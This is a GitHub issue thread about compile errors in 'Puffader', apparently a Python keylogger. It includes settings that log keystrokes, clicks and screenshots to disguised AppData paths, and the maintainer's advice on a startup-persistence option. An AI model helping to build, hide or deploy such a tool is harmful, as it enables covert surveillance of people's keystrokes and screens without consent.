xp4xbox / Puffader

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compile issue #26

Closed tehseensagar closed 6 years ago

tehseensagar commented 6 years ago

Widows 8.1 Python 2.7 lasted files from github

When compiling exe getting following error Missing modules: ? AppKit imported from pyautogui._pyautogui_osx ? Carbon imported from plistlib ? Carbon.File imported from plistlib ? Carbon.Files imported from plistlib ? FCNTL imported from Xlib.support.unix_connect ? ICCProfile imported from PIL.PngImagePlugin ? MacOS imported from platform ? PIL._imagingagg imported from PIL.ImageDraw ? Quartz imported from pyautogui._pyautogui_osx ? Tkinter imported from pymsgbox ? _dummy_threading imported from dummy_threading ? _emx_link imported from os ? _grabscreen imported from PIL.ImageGrab ? _imaging_gif imported from PIL.GifImagePlugin ? _scproxy imported from urllib ? builtins imported from PIL.Image ? ce imported from os ? cv2 imported from pyscreeze ? email.MIMEImage imported from puffadermain ? email.MIMEMultipart imported from puffadermain ? fcntl imported from Xlib.support.unix_connect, subprocess ? gestalt imported from platform ? java.lang imported from platform ? numpy imported from pyscreeze ? org.python.core imported from copy, pickle ? os.path imported from os, shlex ? os2 imported from os ? os2emxpath imported from os ? posix imported from os ? pwd imported from getpass, posixpath ? riscos imported from os ? riscosenviron imported from os ? riscospath imported from os ? rourl2path imported from urllib ? termios imported from getpass ? tkinter imported from pymsgbox ? vms_lib imported from platform ? winreg imported from platform This is not necessarily a problem - the modules may not be needed on this platfo rm. Regards

xp4xbox commented 6 years ago

Are you using cx_freeze or py2exe?

tehseensagar commented 6 years ago

I'm using python cx_freeze_setup.py build but I do have py2exe as well , shell I use py2exe to avoid these errors.

Further more I don't understand how to make it persistence . Do I need to put persistence.ps1 in root directory where setup.py and Puffer.py is located.

Following message seen when compiling using py2exe

The following modules appear to be missing ['AppKit', 'ICCProfile', 'PIL._imagingagg', 'Quartz', '_grabscreen', '_imaging_g if', '_scproxy', 'builtins', 'cv2', 'email.MIMEImage', 'email.MIMEMultipart', 'numpy', 'tkinter']

Puffer.py setting for directoy as below

`blnStoreLocal = "True" # True to save logs/screens locally strLogFile = "C:/Users/%username%/AppData/Local/Microsoft/Inteldat.txt" # set non-protected path to text file eg. c:/temp/test.txt

blnLogClick = "True" # for logging window clicks blnBackRemove = "True" # set this to True if you prefer the program removes the last key if the user types backspace

blnScrShot = "True" # set to True for capturing screenshots strScrDir = "C:/Users/%username%/AppData/Local/Microsoft" # set non-protected dir for scrshot location if storing locally. eg c:/temp intScrTime = 120 # set time for taking screen in seconds`

Persistence.ps1 as below $strFileDir = "Intel"

So far after running compiled exe from dist Puffader.exe I don't see any Inteldat.txt file in above mentioned path.


xp4xbox commented 6 years ago

I have been meaning to improve and simply this project for a while now. I am gonna make some changes to the project tomorrow.

tehseensagar commented 6 years ago

@xp4xbox greate and also simplify the persistence method as well just a config based set it to true it will add it on path such as "C:/Users/%username%/AppData" . Hope to hear from you further more I will test the updated version once you fixed the bug.


xp4xbox commented 6 years ago

Ok, so I updated the rep. So you can nuke persistence, if you want program to start up, just simply set the new option blnAddToStartup to True. Also I updated the setup.py, so when you compile the program, it will create standalone exe.

xp4xbox commented 6 years ago

Also, I just built the program and I have the same message. I ran it, and it worked fine, so you can just ignore that message. If you have any problems let me know.